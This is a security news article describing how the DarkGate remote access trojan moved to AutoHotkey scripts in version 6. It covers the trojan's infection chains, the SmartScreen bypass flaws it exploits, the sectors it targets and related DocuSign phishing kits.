Cybersecurity experts have recently identified a shift in the tactics employed by the DarkGate malware-as-a-service (MaaS) operation, which is now utilizing AutoHotkey scripts instead of the previously favored AutoIt scripts. This adaptation, observed in version 6 of DarkGate released in March 2024 by the developer known as RastaFarEye, marks a significant attempt by threat actors to evade detection mechanisms in an ever-evolving cyber landscape.
DarkGate, a fully-featured remote access trojan (RAT), has been operational since at least 2018 and continues to evolve with each iteration. The latest version is noted for its enhanced functionality that includes command-and-control capabilities alongside modules for various malicious activities such as credential theft, keylogging, and screen capturing. It has reportedly expanded its user base, currently servicing approximately 30 subscriptions.
The security research community, particularly Trellix’s Ernesto Fernández Provecho, highlighted that the incorporation of AutoHotkey into DarkGate’s deployment is particularly novel. Historic data highlights that this technique is not commonly used, indicating a strategic pivot to circumvent established security measures. This marks the first record of DarkGate leveraging this scripting interpreter for launching attacks, emphasizing the increasing sophistication of threat methodologies.
Documentation by McAfee Labs has traced DarkGate’s transition to AutoHotkey back to late April 2024. This change has been linked to recent vulnerabilities, specifically CVE-2023-36025 and CVE-2024-21412, which are exploited to bypass Microsoft Defender SmartScreen protections. Attack vectors typically involve phishing emails that contain Microsoft Excel or HTML attachments, which, when activated, execute malicious scripts designed to mine sensitive user data.
Alternate execution methods have also emerged, leveraging Excel macros intended to trigger Visual Basic Script files that invoke PowerShell commands, ultimately downloading the DarkGate payload. This multifaceted approach to infection reveals a deliberate effort to obscure the initial malware delivery, enhancing its operational stealth.
Version 6 of DarkGate not only introduces new commands but also removes several features present in prior versions, such as cryptomining capabilities and privilege escalation options. This reduction suggests a strategic effort to minimize detection risks associated with previously included functionalities. It also raises questions about user demand for certain capabilities, possibly reflecting a preference among a limited customer base focused on more discreet operations.
In conjunction with the rise of DarkGate, a concerning trend has emerged where cybercriminals exploit legitimate services like DocuSign. These actors are distributing customizable phishing templates on underground forums, further complicating the threat landscape. These fraudulent communications are crafted to mimic legitimate signing requests, luring individuals into divulging sensitive information or executing harmful links.
Recent analyses by Cisco Talos reveal that the AutoHotkey-based DarkGate campaigns are primarily targeting sectors such as healthcare technology, telecommunications, and fintech across the United States, Europe, and Asia. The infection chain is initiated when users open malicious Excel documents crafted to utilize Remote Template Injection, a technique that facilitates the automatic download and execution of harmful content from remote servers.
As the cybersecurity threat landscape continues to evolve, the adaptations seen in DarkGate emphasize the pressing need for organizations to strengthen their security postures. Understanding adversary tactics and techniques, especially those outlined in the MITRE ATT&CK Framework, can provide critical insights for developing effective countermeasures against these sophisticated threats.
